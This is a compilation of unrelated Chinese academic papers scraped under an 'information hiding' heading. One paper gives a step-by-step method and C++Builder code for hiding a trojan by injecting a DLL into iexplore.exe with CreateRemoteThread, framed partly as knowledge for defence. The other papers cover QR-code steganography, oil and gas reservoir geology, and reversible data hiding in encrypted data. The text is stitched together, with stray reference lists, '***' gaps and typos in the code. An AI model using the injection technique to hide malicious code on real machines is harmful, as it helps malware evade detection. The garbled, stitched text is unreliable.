[1]古春杰.信息隐藏技术的理论及应用[J].计算机光盘软件与应用,2014(10):189-190

[2]李彩容,胡瑞敏,涂卫平.使用信息隐藏技术保障档案信息安全[J].中国电子商情•通信市场,2013(1):183-187

[3]马秀芳,时晨,赵洪钢.具有广泛***事应用前景的信息隐藏技术[J].电信快报:网络与通信,2013(12):11-13

[4]刘会平,国伟.数字加网信息隐藏技术在隐秘保密通信中的应用[J].计算机应用,2014,34(9):2645-2649

[5]谢灵智.数字水印——信息安全研究新方向[J].信息安全与通信保密,2013(2):28.

隐藏技术论文篇(7)

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了windows nt/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现windows nt/2000系统中进程的隐藏。

1 基本原理

在win95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在windows nt/2000中却完全不同, 无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过windows nt/2000的任务管理器,windows nt/2000的任务管理器均能轻松显示出木马进程,难道在windows nt/2000下木马真的再也无法隐藏自己的进程了?我们知道,在windows系统下,可执行文件主要是exe和com文件,这两种文件在运行时都有一个共同点,会生成一个***的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和socket已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在windows nt/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2 实现方法

为了弄清实现方法,我们必须首先了解windows系统的另一种"可执行文件"----dll,dll是dynamic link library(动态链接库)的缩写,dll文件是windows的基础,因为所有的api函数都是在dll中实现的。dll文件没有程序逻辑,是由多个功能函数构成,它并不能***运行,一般都是由进程加载并调用的。因为dll文件不能***运行,所以在进程列表中并不会出现dll,假设我们编写了一个木马dll,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马dll,如果那个进程是可信进程,(例如浏览器程序iexplore.exe,没人会怀疑它是木马吧?)那么我们编写的dll作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行dll方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口hook、挂接api、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过createthread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过createremotethread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3 实施步骤

1) 用process32next()函数找到宿主进程,获取宿主进程id,并用

openprocess()函数打开宿主进程。

2) 用virtualallocex()函数分配远程进程地址空间中的内存。

3) 用writeprocessmemory()函数将待隐藏的dll的路径名。

4) 拷贝到步骤二已经分配的内存中。

5) 用getprocaddress()函数获取loadlibrarya()函数的实地址(在kernel32.dll中)。

6) 用createremotethread()函数在远程进程中创建一个线程。

7) 它调用正确的loadlibrarya()函数。

8) 为它传递步骤二中分配的内存地址。

4 具体实例

下面是在c++builder 4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include <vcl.h>

#include <windows.h>

#include <stdio.h>

#include <tlhelp32.h>//该头文件包涵了进程操作的api函数

#pragma hdrstop

#include "unit1.h"

#pragma package(smart_init)

#pragma resource "*.dfm"

insisting pszlibfilename;//存放待隐藏的dll文件名

handle hprocesssnap=null;//进程快照句柄

handle hremoteprocess;//远程进程句柄

lpvoid pszlibfileremote;//远程进程中分配给文件名的空间

hmodule phmd;//存放kernel32.dll句柄

handle hremotethread1=null;//存放远程线程句柄

tform1 *form1;

//---------------------------------------------------------

__fast call tform1::tform1(tcomponent* owner)

: tform(owner)

{

}

//---------------------------------------------------------

void __fastcall tform1::button1click(tobject *sender

{

processentry32 pe32={0};

dword dwremoteprocessid;

hprocesssnap=createtoolhelp32snapshot(th32cs_snapprocess,0);

//打开进程快照

if(hprocesssnap==(handle)-1)

{

messagebox(null,"createtoolhelp32snapshot failed","",mb_ok);

exit(0);

} //失败返回

pe32.dwsize=sizeof(processentry32);

if(process32first(hprocesssnap,&pe32)) //获取第一个进程

{

do{

ansistring te;

te=pe32.szexefile;

if(te.pos("iexplore.exe")|| te.pos("iexplore.exe"))

//找到宿主进程,以iexplore.exe为例

{ dwremoteprocessid=pe32.th32processid;

break;

}

}

while(process32next(hprocesssnap,&pe32));//获取下一个进程

}

else

{

messagebox(null,"取第一个进程失败","",mb_ok);

exit(0);

}

hremoteprocess=openprocess(process_create_thread|process_vm

_operation|process_vm_write,false,dwremoteprocessid);

//打开远程进程

pszlibfilename=getcurrentdir()+"\\"+"hide.dll";

// 假设hide.dll是待隐藏的进程

int cb=(1+pszlibfilename.length())*sizeof(char);//计算dll文件名长度

pszlibfileremote=(pwstr)virtualallocex(hremoteprocess,null,cb,

mem_commit,page_readwrite);

//申请存放文件名的空间

bool returncode=writeprocessmemory(hremoteprocess,

pszlibfileremote,(lpvoid)pszlibfilename.c_str(),cb,null);

//把dll文件名写入申请的空间

phmd=getmodulehandle("kernel32.dll");

lpthread_start_routine fnstartaddr=(lpthread_start_routine)

getprocaddress(phmd,"loadlibrarya");

//获取动态链接库函数地址

hremotethread1=createremotethread(hremoteprocess,null,0,

pfnstartaddr,pszlibfileremote,0,null);

//创建远程线

if(hremotethread1!=null)

closehandle(hremotethread1);//关闭远程线程

if(hprocesssnap!=null)

closehandle(hprocesssnap);//关闭进程快照

}

该程序编译后命名为rmtdll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在c++builder4.0环境下编写并编译了下面的hide.dll作为测试:

#include <vcl.h>

#include <windows.h>

#pragma hdrstop

#pragma argsused

bool winapi dllentrypoint(hinstance hinst, unsigned long reason, void* lpreserved)

{

char szprocessid[64];

switch(reason)

{

case dll_process_attach:

{//获取当前进程id

itoa(getcurrentprocessid(),szprocessid,10);

messagebox(null,szprocessid,"remotedll",mb_ok);

break;

}

default:

}

return true;

}

当使用rmtdll.exe程序将这个hide.dll嵌入iexplore.exe进程后假设pid=1208),该测试dll弹出了1208字样的确认框,同时使用ps工具

也能看到:

process id: 1208

c:\winnt\iexplore.exe (0x00400000)

……

c:\winnt\hide.dll (0x100000000)

……

这证明hide.dll已经在iexplore.exe进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5 结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

参考文献

隐藏技术论文篇(8)

中***分类号:TP393 文献标识码:A 文章编号:1009-3044(2016)16-0077-04

1 概述

二维条码技术是一种广泛应用的信息编码方式,具有编解码快速便捷等特点。借助于智能移动终端设备的普及,二维条码的应用场景越来越多,利用二维条码在移动终端用户之间快速交互信息的应用软件随处可见,渐渐成为一种时尚。受这种风潮的启发,本小组成员开始设想将二维条码技术与信息隐藏思想结合起来,研究一种快捷、安全的秘密消息传递方法。下面介绍相关研究现状和意义。

1)基于信息隐藏的保密通信

信息隐藏[1]是将一则消息、***片或文件隐藏于其他消息、***片或文件中的技术。在信息隐藏过程中,秘密信息往往首先被加密,然后被隐藏在某种载体中,其原理如***1所示的模型。其中的原始***像就是所谓的载体,而发送中的隐藏信息***像就是被嵌入秘密消息之后的载体,因为载体是不易引起怀疑的普通消息、***片或者文件,所以增加了通信路径上密文被窃取的难度,因为攻击者根本就不会发现有秘密通信在进行。信息隐藏技术的应用很广,保密通信、身份认证、数字版权保护和追踪以及信息完整性、真实性鉴定与内容恢复等方面都在使用信息隐藏技术[2-4]。其中,利用信息隐藏技术进行保密通信时,通信双方将秘密信息隐藏在数字载体中并利用公开信道进行传递,这种保密通信方式在***事、商业、金融等方面领域都有广泛的应用。

有关载体的研究是信息隐藏技术的基础。随着信息技术的发展,可供使用的载体类型变得越来越丰富,研究人员在不断挖掘传统载体类型如文本、***像、音频和视频等潜力的同时[5-8],对于新隐藏载体的发掘一直在进行,比如在网页中隐藏信息[9],在基于PE文件的信息隐藏技术[10],在DNA序列中隐藏信息等。综合各种优秀的信息隐藏方法可知,要实现基于信息隐藏的秘密通信,隐藏载体往往满足一些基本的特征,如本身含有大量可利用的冗余信息,嵌入和提取信息效率要高,抗攻击能力强等,此外常用的载体类型如JPG***片,MPEG视频文件等都是常见的文件类型,也就是说传播广泛而不容易引起怀疑。

2)二维条码技术广泛应用

二维条码是一种特殊的条码技术,简称二维码。与一维条码技术相比,它采用矩形、点、六边形等几何***案来表示信息,编码时使用若干个与二进制相对应的几何形体来表示文字数值信息,解码时则通过***像输入或光电扫描设备自动识读信息。除信息表示方法不同外,二维码仍具备普通条码的一些共性,如每种码制有特定的字符集;每个字符占有一定的宽度;具有校验功能等。

因为二维码具备快速响应和快速数据访问的能力,所以随着智能手机的逐渐普及,二维码编解码功能软件已经几乎成为了智能手机的标配软件。目前常用或知名的二维条码编码机制有DataMatrix,MaxiCode,QRCode,汉信码等,其中QR码是目前应用最广泛的条码之一,该种编码最多可以表示7089个字符,而传统一维条码最多则只能表示20个字符,足见其优势。

就应用现状来说,二维条码技术已经十分成熟,尤其是与智能移动终端的结合使其得到广泛的应用,二维条码技术之所以得到广泛的应用除了其自身快速易读和高存储能力的优势外,还仰仗于移动智能终端的快速普及和网络通信的发达,尤其是智能手机的普及,激发了人们的想象力,把这种便捷的信息编解码方式应用到了产品跟踪,物品标识,实时追踪,文档管理,市场营销等一系列领域,比如移动即时通信软件用户之间可以使用二维码来相互添加好友、登陆网站,自动贩卖机可以使用二维码进行商品识别,商家也都纷纷利用二维码来自己的商业推广信息,甚至各种票据上也有基于二位条码制作的车票方位功能等。

1.1.2研究意义

本软件最大的特点在于其对隐藏信息安全性上的保护,本软件针对目前广泛存在的通过破解注册码完成注册身份认证而对软件进行非法使用的问题,设计并实施了一系列的安全解决方案。

信息隐藏在秘密通信过程中的应用也随着其他信息技术的发展不断升级,其与新技术的结合是一种趋势,同时也符合科技发展的规律。随着智能手机的迅速普及,二维条码技术被推广到生活的各个领域,我们设想将二维码应用于信息隐藏领域,把二维码作为隐藏信息的载体,根据编码机制的特点,把秘密消息嵌入其中,简单情况下,秘密消息可以只是经过加密过的密文,复杂情况下,秘密消息可以存储于另一个二维码当中,最终我们则希望普通的解码器只能察觉载体中无价值的内容,而只有依据本文提出的特殊算法设计的解码器通过得到服务器的解密信息后才能发现秘密消息的存在并将其解读。在理论研究的基础上,我们将基于手机安卓系统设计并实现符合该设想的秘密消息传递软件,实现秘密消息的和接收,检验方法的有效性和应用价值。

本文拟将流行的二维条码编码技术和信息隐藏研究相结合,设计一种基于二维条码的信息隐藏方法,并基于安卓系统设计实现对应的软件,包括编码器和服务器;

基础工作就是首先实现正常二维码的功能,然后从最简单的情况入手,仅存储少量密文,在不影响原文的情况下,实现其功能,然后在理论探究的基础上实际测量出存储的最大容量,以及最典型的情况,不断完善编码器和服务器的可信度,以期达到实用化的目的。

3 实验

我们在测试过程中使用的数据如下表所示。

生成的二维码已包含隐藏信息,我们将使用二维码的用户分为普通用户(没有注册)和特殊用户(已经注册),只有特殊用户通过验证才能使用信息隐藏和提取的功能。我们可以根据上表的数据看到,信息隐藏之后的二维码发生了变化,但是普通的扫码器并不能提取到隐藏信息,这就起到了保密的作用。

下表为不同版本的信息容量:

对比其他编码形式和方法,我们选取设计的基于二维码的方法具有抗破解能力强的优点:

1)最终密文嵌入位置隐蔽性强;

2)多组密钥对,若不能与相应的加密公钥对应,即使解密私钥被截获也不能得到明文;

3)特征值嵌入初级密文构成最终密文,即使最终密文被提取直接破解也无法得到明文。

4 结论

隐私和安全是目前社会网络通信最受关注的问题,本文对一种基于二维码的信息隐藏方法做了深入研究,采用计算机模拟与手机安卓系统模拟相结合的方式,进行测试与实验,以期达到秘密通信的目的。

研究过程中主要运用的是二维码技术和信息隐藏技术,二维条码技术应用范围广泛,在智能移动终端设备不断普及的当代,应用二维码的场景越来越多许多应用软件也在利用二维码再移动用户之间进行快捷的信息交互,而当二维码遇上信息隐藏,把二维码作为隐藏信息的载体,普通的解码器只能察觉载体中无价值的内容,而只有依据本项目提出的特殊算法设计的解码器才能发现并解读其中的秘密信息,无疑将大大提高通信的安全性,在理论研究的基础上,基于手机安卓系统设计进一步实现符合该设想的秘密消息传递软件,实现秘密消息的和接收,检验方法的有效性和应用价值。

参考文献:

[1] Petitcolas F A P, Anderson R J, Kuhn M G. Information hiding-a survey[J]. Proceedings of the IEEE, 1999, 87(7): 1062-1078.

[2] Yang G, Li J, He Y, et al. An information hiding algorithm based on intra-prediction modes and matrix coding for H. 264/AVC video stream[J]. AEU-International Journal of Electronics and Communications, 2011, 65(4): 331-337.

[3] Jayaram P, Ranganatha H R, Anupama H S. Information Hiding Using Audio SteganographyCA Survey[J]. The International Journal of Multimedia & Its Applications (IJMA) Vol, 2011, 3: 86-96.

[4] Kaur A, Goel A, Gupta H. Digital watermarking in neural networks models[C]//Engineering and Computational Sciences (RAECS), 2014 Recent Advances in. IEEE, 2014: 1-6.

[5] Al-Shatnawi A M. A new method in image steganography with improved image quality[J]. Applied Mathematical Sciences, 2012, 6(79): 3907-3915.

[6] Ren W, Liu Y, Zhao J. Provably secure information hiding via short text in social networking tools[J]. Tsinghua Science and Technology, 2012, 17(3): 225-231.

[7] Zheng P, Wang W, Zhao B, et al. Hiding information in MPEG sequences by using of B-Frames[J]. Wuhan University Journal of Natural Sciences, 2012, 17(3): 238-242.

[8] Xu E, Liu B, Xu L, et al. Adaptive VoIP steganography for information hiding within network audio streams[C]//Network-Based Information Systems (NBiS), 2011 14th International Conference on. IEEE, 2011: 612-617.

[9] Ren J, Zhang L, Wang C. A webpage information hiding algorithm based on integration strategy[C]//Information Science and Digital Content Technology (ICIDT), 2012 8th International Conference on. IEEE, 2012, 3: 707-711.

隐藏技术论文篇(9)

关键词:隐蔽油气藏;层序地层学;层序面

Key words: subtle reservoir;sequence stratigraphy;sequence surface

中***分类号:P53 文献标识码:A文章编号:1006-4311(2011)04-0065-01

1隐蔽油气藏

目前在我国东部地区,勘探成熟盆地的勘探主要目标就是隐蔽油气藏的勘探。结合国内外的多种隐蔽油气藏的勘探方面的实践和研究成果,可以看出在层序地层学理论和框架下进行综合的分析研究,找到最佳的勘探方法是目前隐秘油气藏勘探比较有效的技术。

1.1 隐蔽油气藏分类隐蔽在储层中能够聚集油气的地方称为圈闭,他也是油气的保存场所,因此圈闭是油气藏分类的主要指标,在圈闭中聚集的具有工业使用价值的油气即为油气藏。按照石油地质学分类,一般可以将圈闭和油气藏按照圈闭所形成的条件和地质情况,大致分为四类,一是构造油气藏/圈闭,地层油气藏/圈闭,水力油气藏/圈闭和复合型油气藏/圈闭。所谓隐蔽油气藏,是那些很难用普通的勘探方法探测到,位置出于比较隐秘的圈闭的各种油气藏,这类油气藏多为岩性地层油气藏,其特殊构造使得自身隐蔽性比较高,发现的几率远小于普通油气藏。隐蔽油气藏这一概念是按照勘探油气藏的难度所提出力度,与其形成原因和类型没有关系,并非特指某一类圈闭。所以在分类中并没有单独列出这一种油气藏。在实际勘探油气藏的过程中,隐蔽油气藏这一概念却有着非常重要的实践意义和理论意义,去隐蔽油气藏进行详细划分也是非常必要的。以便于在实际勘探中根据各种不同隐蔽油气藏,针对其各自特点,采取最佳勘探方式。

1.2 勘探隐蔽油气藏的现状隐蔽油气藏(圈闭)是美国地质学家来复生最先提出的,几十年来各国地质学家对其理论不断扩充,将底层、岩性等融入其中加以整合并取得了巨大进展,新理论新发方法也在实践中得到充分应用,逐渐形成了一套比较完整有效的隐蔽油气藏的勘探方法和技术流程。根据长期的勘探实践经验,在勘探程度比较高的盆地中,有些含量较高的油气藏占到了地质总储量的百分之五十以上,容易形成大型甚至超大型的油气田。所以,即使勘探隐蔽油气藏的难度远大于普通油气藏,但是其更具有勘探意义。虽然隐蔽油气藏分布的隐蔽性比较强,但还是可以抓住其分布特点找到分布规律,在隐蔽油气藏勘探技术水平和地质理论学不断进步的条件下,我们在隐蔽油气藏的勘探方面也取得了巨大进步。

2隐蔽油气藏勘探研究

2.1 层序地层学层序地层学创立于二十世纪八十年代,由Vail在被动大陆边沿海相沉积的研究过程中建立的,后来又Galloway、Jervey等人有陆续创立了成因层序地质学和高密度层序地质学等理论体系。但是,层序地质学是以:周期性的海平面的变化控制回旋的沉积作用为理论基础,另外还包括同时期同勾选会的沉积作用所构成的岩石组合称为层序等。岩相可以按照层序地质学理论的周期性、旋回性、以及等时性等方式进行分类,对其分布的方式和规律做出科学有效的判断。储集岩大多在层序交界的周围发育,但是在层序的内部却形成的是凝缩段沉积,它与周围的岩相相比质地较细,有机质丰富。因为水域比较浅,在湖盆体系位置较低以及扩张的体系中的陆相断陷是受限的,而且有着比较大的落差,因此一般在冲积扇或者扇三角洲沉积地域发育。处于晚期的湖盆收缩体系在其水体的收缩影响下,一般是发展成为进积型和扇型三角洲,还有的发育成泛滥平原沉积,所以在岩层序交界的周围是发现砂体的重点位置。因为相对湖平面的变化为周期变化,从而使其沉积具有多旋回合的特点,同时也促成了陆相断陷湖盆的多套储盖组合的发育,以及多套含油气层的形成。

2.2 建立层序地层的格架首先是对某已知的产油井A和另一干B、C井所形成的共联井,识别出其地震剖面***上的层序交界面,而且不整合不接触上地层和下地层。看层序界面上看,可以明显的看到A井所处的界面有着侵蚀下切地震反说的特点,这符合Ⅰ型层序界面的特点。另外在合成的地震记录中综合标定层序界面和测井层序界面,从而建起一个可以将测井等时层序地层同地震想比较的格架。

2.3 预测生储盖层在将井间等时地层通过做剖面成像时,需要把等时地层的格架选作为基准面,再利用三维提取信息技术,对三维的地震岩层的进行信息采集,然后做沉积微相的平面成像。同时分析地震相关的信息,预测出生储盖的空间分布。从形成时间上来看,烃源岩是在最大湖泛期形成的,在那时期因为相对面的升高速度以及湖盆容积增大的速度都是最快的,因此断陷湖盆也在此时发生欠补偿的沉积,导致了凝缩段沉积。这一沉积是以深色泥岩为主,其成分以含深水介丰富的化石以及夹油页岩,非常有利于油气的生成、保存。在生烃的门限深度下面的凝缩段在油气生成的过程中叶起到了非常重要的作用,这一段属于烃源岩;在生烃的门限深度上面的凝缩段所起的作用主要是对油气进行封堵,这一段是盖层。在湖盆收缩体系的后期阶段以及扩张体系的初期阶段,主要是形成了储集岩,其岩层序界面是非常容易形成下切河道,它非常有利于油气的储集,所以寻找下切河道的正确方向是向着层序界面。

3勘探隐蔽油气藏的发展趋势

目前的层序地层学是以沉积层的旋回性为基本点,按照等时性的要求,做出了岩相分布模式的预测和生储盖层分布的判断。烃源岩和盖层基本上是在湖泛期所形成的,在生烃门限深度下面的凝缩段为烃源岩的形成和发育提供了场所,而生烃门限深度上面的凝缩段为形成油气提供盖层。第二,在储集体的寻找应该在层序界面周围,尤其是在Ⅰ型层序界面附近。第三,形成沉积多旋回性的原因主要是由相对湖平面高低变的周期性所导致的,同时也孕育了断陷湖盆多套生储盖组合以及多套含油气层。隐蔽油气藏的勘探理论和技术发展是一个多学科综合发展的成果,是石油地质综合发展的方向。由于其形成原因复杂,勘探难度大,必须要在现有方法上进行开拓创新、优化技术手段、探寻新的勘探思路,全面对油气藏区域进行识别,评价和选优,并对隐蔽油气藏做预探评价。

参考文献:

隐藏技术论文篇(10)

中***分类号:TP309.7

文献标志码:A

文章编号:1001-9081(2016)11-3067-10

0 引言

信息隐藏技术自20 世纪 90 年代诞生以来,在隐私、版权保护等信息安全领域发挥的作用日益增强[1-3],传统的信息隐藏通常是非可逆信息隐藏,嵌入过程会给原始载体带来永久性失真,这在一些对数据认证要求高,同时需要无失真恢复出原始载体的应用场合是不可接受的,如云环境下加密数据标注、远程医学诊断、司法取证等。为了兼顾信息隐藏与原始载体的无失真恢复,可逆信息隐藏技术被提出,要求在嵌入隐藏信息后可以无差错恢复出原始载体[4]。可逆信息隐藏根据载体是否加密分为密文域与非密文域两类,其中密文域可逆信息隐藏用于嵌入的载体是经过加密的,嵌入信息后仍然可以无差错解密并恢复出原始载体[5],密文域可逆信息隐藏技术与信息隐藏技术的分类关系如***1所示。现有的综述文献[6-7]已对可逆信息隐藏的技术现状进行说明。文献[6]根据可逆信息隐藏的不同应用领域将当前的算法分为6类:1)空域算法;2)压缩域算法;3)***像半脆弱认证领域算法;4)***像对比增强算法;5) ***像加密域算法;6)其他数字载体类算法(视频、音频等)。其中:第1)~4)类算法属于非密文域可逆信息隐藏算法,第5)类算法属于密文域可逆信息隐藏算法。与文献[6]不同,本文综述的重点是针对密文域算法(包括***像加密、对称及公钥加密密文域),对当前各类密文域可逆嵌入技术的具体框架进行归纳说明,对相关技术进行系统的分类,并对各类中的代表算法进行重点分析。

加密技术通常用于实现信息存储与传输过程中的隐私保护,密文域可逆信息隐藏可主要用于加密数据管理与认证,隐蔽通信[5,8]或其他安全保护。如:医学***像在远程诊断的传输或存储过程中通常经过加密来保护患者隐私,同时需要嵌入患者的身份、病历、诊断结果等来实现相关***像的归类与管理,但是医学***像任何一处修改都可能成为医疗诊断或事故诉讼中的关键,因此需要在嵌入信息后能够解密还原原始***片;***事***像一般都要采取加密存储与传输,同时为了适应***事场合中数据的分级管理以及访问权限的多级管理,可以在加密***像中嵌入相关备注信息,但是嵌入过程不能损坏原始***像导致重要信息丢失,否则后果难以估计;云环境下,为了使云服务不泄露数据隐私,用户需要对数据进行加密,而云端为了能直接在密文域完成数据的检索、聚类或认证等管理,需要嵌入额外的备注信息。***2为密文域可逆信息隐藏技术在云环境中通过用户身份认证实现上传***权限管理的应用示意,其中用户B代表申请***的用户,B可以是上传者本人(用户A);在密文传输过程中,以可逆方式嵌入校验码或哈希值可以实现不解密情况下数据的完整性与正确性检验;同时密文域可逆隐写可有效实现隐蔽通信,传统的以明文多媒体数据为载体的隐写算法难以做到可证明性安全,而传统的阈下信道技术以网络通信协议为掩护传输信息,具有可证明安全性,但是其信息传输率很低[9],密文域隐写技术在上述两者的基础上发展起来,逐渐成为隐写术新的研究热点[10]。综上,密文域可逆信息隐藏对于加密环境下的诸多领域有着较大的应用需求,对于数据处理过程中的信息安全可以起到双重保险的作用,尤其随着云服务的推广,密文域可逆信息隐藏作为密文信号处理技术与信息隐藏技术的结合,是当前云环境下隐私数据保护的研究重点之一[11]。

1 系统框架与技术难点

密文域可逆信息隐藏技术中秘密信息的实际载体为密文,对于携密密文既要求能够有效提取秘密信息,又要求能够正确解密,并最终恢复原始载体,其中信息嵌入提取是信息隐藏技术的要求,携密密文的正确解密与明文载体的无损恢复是实现可逆的关键技术环节。结合密文域可逆信息隐藏的技术要求与应用背景,相关算法在设计与实现过程中主要包含两大模块:载体的加、解密模块与秘密信息的嵌入、提取模块,如果对携密密文载体的直接解密结果存在失真,算法中需要引入可逆恢复过程对解密失真载体进一步恢复。

密文域可逆信息隐藏系统各模块的关系如***3所示。明文载体经过加密与信息嵌入后得到携密密文,根据加密与嵌入算法不同,加密与嵌入过程的先后顺序不固定;对携密密文的操作,根据算法的适用场景主要可分为4种操作流程,分别对应***3中Ⅰ、Ⅱ、Ⅲ、Ⅳ。

操作Ⅰ是直接对携密密文进行解密,得到的解密载体通常含有失真,然后进行信息提取与载体恢复,载体的恢复过程通常是基于直接解密载体的特征,如***像像素间相关性,或嵌入信息中含有用于载体恢复的信息。操作Ⅱ是先提取信息,然后根据已知的嵌入信息来进行数据解密与进一步的可逆恢复,操作Ⅰ、Ⅱ一般以***像作为明文载体,使用流密码进行逐位异或加密,实现可逆性的关键在于携密密文解密过程的正确性与载体恢复过程的可逆性。满足操作I(或Ⅱ)的算法适用于接收方可以提取秘密信息并要求恢复出明文载体的应用场景。操作Ⅲ是使用解密密钥直接解密携密密文,即可无失真得到原始明文,因此不需要引入可逆恢复的过程,算法一般在公钥加密算法的加密冗余中嵌入额外信息,实现可逆性的关键在于对加密冗余的有效利用,以及充分保证直接解密携密密文的正确性。对应操作Ⅲ的信息提取方式通常是操作Ⅳ,使用隐藏密钥可以直接在携密密文中提取信息。同时满足操作Ⅲ、Ⅳ(或Ⅰ、Ⅳ,或Ⅱ、Ⅳ)的算法适用于针对不同用户,要求分配解密或信息提取不同权限的应用场景。由此,第2章基于不同的嵌入、提取特点及可逆实现技术对当前算法进行分类,并详细对各类算法的实现框架进行说明与分析。

由上述分析可知,明文经过数据加密与信息嵌入后得到携密密文,数据解密与信息提取的操作对象是携密密文。加解密过程与信息嵌入提取过程在密文域可逆算法中交叉存在并且互相制约,造成密文域可逆信息隐藏存在诸多技术难点,主要为以下4点:一是实现嵌入后密文的无失真解密及载体恢复的完全可逆;二是密文数据中的大容量嵌入;三是信息提取与解密过程可分离;四是保证嵌入过程的安全性或信息的不可检测性等。分析上述难点的主要原因:一方面,当前的信息隐藏技术极大地依赖载体的编码方式、所属的媒体类型,或者变换域的属性,而嵌入信息的过程必然要对载体数据特征进行重新量化与修改,但是加密会使明文内容呈现出最大的无规律性和不确定性,原有特征难以被提取和利用。从信息论的角度来说,在原载体中隐藏信息会导致其信息量增大,在文件大小不变的情况下,信息熵必然会增大。但是加密已经使密文信息熵趋于最大值,所以理论上来说在密文数据中隐藏信息是比较困难的。另一方面,现代加密算法要求明文的极小改变也将扩散到整个密文空间,而可逆算法的嵌入过程往往***于加密过程,使得嵌入过程中修改的加密数据越多,解密结果失真会越大,因此要在保证解密没有失真的情况下进行信息嵌入,或提升嵌入容量的难度较大。

2 关键技术及分类

针对密文域可逆信息隐藏的技术要求与存在难点,当前算法种类繁多,根据数据加密与信息嵌入的结合方式,算法主要可分为非密文域嵌入与密文域嵌入两类。下面分别对非密文域嵌入与密文域嵌入两类算法的关键技术、优势及局限性进行论述分析。

2.1 非密文域嵌入算法

非密文域嵌入算法主要是借鉴当前的非密文域的信息隐藏技术,包括差值扩展嵌入[4]、直方***平移技术嵌入[12-14] 以及利用***像压缩技术嵌入[15]等,在加密载体中嵌入数据,并且可以在嵌入后有效解密恢复加密前载体,能够达到了密文域可逆信息隐藏的技术要求;但是由于载体加密后往往会丧失原有的可嵌入特征,上述嵌入方法在密文域中可选择的嵌入特征往往较少,因此该类算法先通过非密文域操作的途径保留或获取可嵌入特征来嵌入信息,而后进行加密。在嵌入与加密完成后,根据对携密密文载体解密与信息提取两过程的顺序是否固定,算法分为可分离与不可分离算法,分别对这两类非密文域嵌入算法进行说明如下。

2.1.1 不可分离的非密文域嵌入算法

不可分离的非密文域嵌入算法获取可嵌入的特征的方法主要通过保留部分加密前载体的特征用于嵌入,而将其他部分用于加密,所用特征通常为载体压缩过程中的属性特征或变换域系数等。

文献[16]的密文域嵌入技术并不是针对可逆信息隐藏提出,但是嵌入过程可有效说明不可分离的非密文域嵌入类算法的特点,对携密密文的解密结果具有对原始***像恢复的可逆性,在后来的研究与文献中被多次引用。文献[16]进行嵌入与加密的特征来自基于哈尔小波基的n级小波分解,产生选择可分离的滤波器组,对输入***像进行哈尔变换,产生LH、HL、HH三种高频带系数,一个 LL低频带系数(3级分解时如***4所示)。其中低频带是由哈尔变换分解级数决定的最大尺度、最小分辨率下对原始***像的最佳逼近。

以3级分解为例说明文献[16]加密与嵌入过程如***5所示,在得到3级haar变换***像后,进行位平面分离,得到若干层位***(***5中为8层)。

其中最低有效位(Last Significant Bit, LSB)层用haar变换后各系数的符号构成的矩阵来替换。选择前若干最高有效位层进行加密(***5中为前3层),剩余位层用于嵌入秘密信息。最后将加密或携密位层进行位平面合成并进行haar逆变换,提到携密密文***像。而在方案设计中,由于信息提取需要根据明文像素信息,因此需要先解密前若干最高有效位层,根据携密明文***像提取嵌入信息,算法的可逆恢复依赖于明文像素相关性与已知的嵌入信息,根据携密明文***像与提取的秘密信息可进一步恢复原始***像,因此方案信息提取与载体恢复的顺序固定。

该类算法有效规避了密文数据特征提取的难题,相关算法还包括如文献[17]通过有选择地加密部分离散余弦变换(Discrete Cosine Transform, DCT)系数,而在加密之后还保留一部分特定位置的DCT系数信息用以数据嵌入;文献[18]提出了一种在加密了的H.264/AVC格式视频中嵌入数据的方法,其中动作、纹理和剩余信息都被部分加密。***6为此类不可分离的非密文域算法的嵌入模型,可见算法在恢复载体前通常需要先将嵌入位置的信息提取,并恢复负载秘密信息的特征或系数,否则难以实现载体的可逆恢复,因此解密与提取过程不可分离。

2.1.2 可分离的非密文域嵌入算法

